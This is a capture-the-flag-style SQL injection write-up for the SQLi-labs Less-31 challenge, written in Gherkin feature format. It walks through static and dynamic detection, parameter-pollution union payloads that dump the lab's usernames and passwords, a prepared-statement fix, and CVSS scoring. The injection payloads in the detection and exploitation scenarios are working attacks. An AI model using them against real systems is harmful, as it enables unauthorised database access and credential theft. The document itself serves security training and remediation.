## Version 1.4.1
## language: en

Feature:
  TOE:
    SQLI-labs
  Category:
    SQL Injection - GET-BLIND-Impidence-Mismatch
  Location:
    http://localhost/sqlilabs/Less-31/ - id (field)
  CWE:
    CWE-89: SQL Injection
      https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173 Discard unsafe inputs
      https://fluidattacks.com/web/rules/173/
  Goal:
    Check if the site is susceptible to SQL injection
  Recommendation:
    Only use prepared statements for sanitized data

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    | Windows         |     10      |
    | Firefox         |   80.0a1    |
    | XAMPP Server    |   7.4.7-0   |

  TOE information:
    Given I am accessing the main page
    And enter in one of the php challenges pages
    And MYSQL is the Database Management System
    And the website is running in localhost

  Scenario: Normal use case
    Given I access the page
    When I enter, a message is displayed
    """
    This Site Protected by World's Best Firewall
    """
    Then I set the "id" parameter
    """
    ?id=4
    """
    And a new message appears on the screen
    """
    Your Login name:secure
    Your Password:crappy
    """

  Scenario: Static detection
    Given I open the file index.php in the challenge folder
    When I inspect the code, I notice in lines 20, 31 and 32
    """
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    """
    Then I analyze those lines
    And find out that prepared statements are not used
    And the SQL query is vulnerable to an SQL injection

  Scenario: Dynamic detection
    Given I am on the main page
    When I attempt to inject the "id" parameter as
    """
    ?id=4%20and%202=4--+
    """
    Then The following message appears on the screen
    """
    Your Login name:secure
    Your Password:crappy
    """
    When I try to inject the "id" parameter as
    """
    ?id=4\'
    """
    Then I see an error message on the screen
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MySQL server version for the right syntax to use near ''4\'' LIMIT 0,1'
    at line 1
    """
    When I attempt to inject the "id" parameter as
    """
    ?id=1&id=4
    """
    Then A message appears on the screen
    """
    Your Login name:secure
    Your Password:crappy
    """
    When I inject the "id" parameter as
    """
    ?id=1&id=4%20union%20select%201,2,3%20--+
    """
    Then The same message appears on the screen
    When I attempt to inject the "id" parameter as
    """
    ?id=1&id=-99%20union%20select%201,2,3%20--+
    """
    Then A message appears on the screen
    """
    Your Login name:2
    Your Password:3
    """
    And the query is vulnerable to SQL injection

  Scenario: Exploitation
    Given I am on the page
    When I inject the "id" parameter:
    """
    ?id=1&id=-99%20union%20select%201,group_concat(username),
    group_concat(passsword)%20from%20users%20--+
    """
    Then I get the output:
    """
    Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,
    admin1,admin2,admin3,dhakkan,admin4,admin5
    Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,
    admin,admin1,admin2,admin3,dumbo,admin4,admin5
    """
    And the query on the site is vulnerable to SQL injection

  Scenario: Remediation
    Given The site has a vulnerable query against SQL injection
    When The site is not sanitazing input data using prepared statements
    Then The code should be replaced with
    """
    $q1 = $mysqli->prepare("SELECT * FROM users WHERE id=? LIMIT 0,1");
    $q1->bind_param("i", $id);
    $q1->execute();
    $q1->close();
    """
    Given this new code, now the SQL statements are prepared
    When the id parameter is transmited to the Database
    Then it does not need to be correctly escaped
    And That is because, it will be transmited using a diferent protocol
    And a little later than the prepared statement, that works as a template
    Then the SQL query is no longer susceptible to SQL injections

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.4/10 (Medium) - CR:L/IR:L/AR:L/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L
  Scenario: Correlations
    No correlations have been found to this date {2020-07-03}
